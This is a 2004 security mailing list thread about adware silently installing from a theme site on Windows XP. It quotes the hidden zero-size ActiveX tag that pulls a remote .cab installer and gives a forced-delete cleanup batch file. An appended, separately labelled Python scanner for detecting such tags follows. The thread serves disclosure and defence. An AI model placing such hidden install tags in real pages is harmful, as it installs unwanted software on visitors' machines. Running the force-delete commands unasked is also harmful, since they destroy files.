RE: [Full-Disclosure] Spyware installs ... XP SP2 box

From: Geraldo Rivera (iamafraud_at_hotmail.com)
Date: 10/06/04

    To: ACastigliola@unumprovident.com, raize@gravito.com, full-disclosure@lists.netsys.com
    Date: Tue, 05 Oct 2004 19:30:05 -0400
    
    

    Thanks to everybody for all the info posted here. I wish I had a machine
    available right now to set up a vanilla SP2 install so I could witness the
    results of visiting the site again myself.

    I did indeed say that I have visited the site in the past. However, I hadn't
    in a number of months prior to this visit. I also did not discover any
    adware/spyware that was installed on my machine prior to 10/2 (nor did
    ad-aware, spybot, or pest-patrol). I trust in the info that has been posted
    here, I just wish that I could witness it myself. I am very cautious when
    surfing (I know somebody is going to tell me not cautious enough since I am
    still using IE) so I am wondering what could have been installed prior to
    this visit that allowed this install to happen without any interaction.

    Regardless, thanks again to everybody for the good info, and a big *** you
    to themexp.org.

    >From: "Castigliola, Angelo" <ACastigliola@unumprovident.com>
    >To: "raize" <raize@gravito.com>, <full-disclosure@lists.netsys.com>
    >Subject: RE: [Full-Disclosure] Spyware installs ... XP SP2 box
    >Date: Tue, 5 Oct 2004 12:11:24 -0400
    >
    >Thank you for the test Raize. I appreciate your time.
    >
    > >One must assume that you are installing these "theme packs" via some
    >BHO (Browser Helper Object) that you
    > >installed previously or put the site on the "Always trust content from
    >this provider". Perhaps someone
    > >else can explain where I am missing the exploit, because a quick glance
    >over seems to indicate there is
    > >none for XP SP2. (I did not test this on SP1)
    >
    >I think you are right. It seems the only person that was not prompted
    >for the install that was not running SP2 was the original author of this
    >thread who said that it was a previously visited site.
    >
    >As far as users running SP1, there is no security warning that says an
    >executable is about to be installed. There is no Microsoft Update that
    >will prevent this from loading. Like most large organizations, just
    >jumping to SP2 is not an option. It needs to go through rigorous testing to
    >make sure it complies with all of our internal software.
    >
    >Angelo Castigliola III
    >Operations Technical Analyst I
    >UnumProvident IT Services
    >207.575.3820
    >-----Original Message-----
    >From: full-disclosure-admin@lists.netsys.com
    >[mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of raize
    >Sent: Tuesday, October 05, 2004 9:29 AM
    >To: full-disclosure@lists.netsys.com
    >Subject: Re: [Full-Disclosure] Spyware installs ... XP SP2 box
    >
    >
    >The installed code is definitely:
    >
    ><object id="DDownload_UL1"
    >classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
    >codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab"
    >HEIGHT=0 WIDTH=0></object>
    >
    >However, there is no exploit here. I loaded this with a default honeypot
    >image of XPSP2 with IE as an Admin and nothing else installed other than
    >the drop down that asked me if I really wanted to trust this site for
    >installing an executable.
    >
    >One must assume that you are installing these "theme packs" via some BHO
    >(Browser Helper Object) that you installed previously or put the site on
    >the "Always trust content from this provider". Perhaps someone else can
    >explain where I am missing the exploit, because a quick glance over
    >seems to indicate there is none for XP SP2. (I did not test this on SP1)
    >
    >Spybot and Ad-aware do not catch and kill WinRebates and WinAd
    >spy/adware properly, but I have a batch command that will do it for you.
    >Included is a .zip of each IP contacted along with full URL request and
    >output. It also contains the contents of this email and the batch file
    >with these commands: (You'll want to rename the .txt to .bat)
    >
    >--------------------------------------------
    >cd "C:\Program Files\Winad Client"
    >taskkill /T /F /IM WinClt.exe
    >taskkill /T /F /IM WinAd.exe
    >erase WinClt.exe
    >erase WinAd.exe
    >cd ..
    >cd Web_Rebates
    >taskkill /T /F /IM WebRebates0.exe
    >taskkill /T /F /IM WebRebates1.exe
    >erase WebRebates0.exe
    >erase WebRebates1.exe
    >cd ..
    >rd /Q /S "Winad Client"
    >rd /Q /S "Web_Rebates"
    >cd "C:\Windows\system32"
    >taskkill /T /F /IM fjdria.exe
    >taskkill /T /F /IM ezSP_Px.exe
    >erase fjdria.exe
    >erase ezSP_Px.exe
    >
    >_______________________________________________
    >Full-Disclosure - We believe in it.
    >Charter: http://lists.netsys.com/full-disclosure-charter.html


    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
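As an added illustration (not code from the thread or from any poster): a small Python scanner that flags the pattern raize quoted, a hidden `<object>` tag whose `codebase` pulls a remote .cab, the way a proxy or page-inspection check would. The `<object>` tag and the themexp.org host come from the thread; the surrounding HTML and the second, all-zero placeholder CLSID are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Constructed sample page: the first <object> is the tag quoted in the thread,
# the second is a harmless placeholder with no codebase (constructed CLSID).
SAMPLE_HTML = """<html><body>
<h1>Theme packs</h1>
<object id="DDownload_UL1"
classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA"
codebase="http://www.addictivetechnologies.net/DM0/cab/ATPartners.cab"
HEIGHT=0 WIDTH=0></object>
<object classid="clsid:00000000-0000-0000-0000-000000000000" width="400" height="300"></object>
</body></html>"""

OBJECT_RE = re.compile(r"<object\b(.*?)>", re.IGNORECASE | re.DOTALL)
# name=value pairs, with double-quoted, single-quoted or bare values
ATTR_RE = re.compile(r"([A-Za-z_:][-\w:.]*)\s*=\s*(\"([^\"]*)\"|'([^']*)'|([^\s>]+))")


def parse_attrs(attr_text):
    """Return lower-cased attribute names mapped to their unquoted values."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        value = next(v for v in (m.group(3), m.group(4), m.group(5)) if v is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def find_activex_installs(html, page_host=None):
    """Flag <object> tags that ask the browser to fetch and install code.

    page_host is the host serving the page; a codebase on another host is
    reported as third-party. Returns one finding per suspicious tag.
    """
    findings = []
    for m in OBJECT_RE.finditer(html):
        a = parse_attrs(m.group(1))
        classid, codebase = a.get("classid", ""), a.get("codebase", "")
        if not classid.lower().startswith("clsid:") or not codebase:
            continue  # no remote code download requested by this tag
        host = urlparse(codebase).hostname or ""
        reasons = []
        if codebase.lower().endswith(".cab"):
            reasons.append("remote .cab codebase")
        if page_host and host and host.lower() != page_host.lower():
            reasons.append("third-party host %s" % host)
        if a.get("height", "").strip() == "0" and a.get("width", "").strip() == "0":
            reasons.append("zero-size (hidden) object")
        findings.append({"clsid": classid[6:].upper(), "codebase": codebase, "reasons": reasons})
    return findings
```

On SP2 the install shown here still prompts, as raize observed; the value of the check is catching the tag before a user who has already trusted the publisher or site sees no prompt at all.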

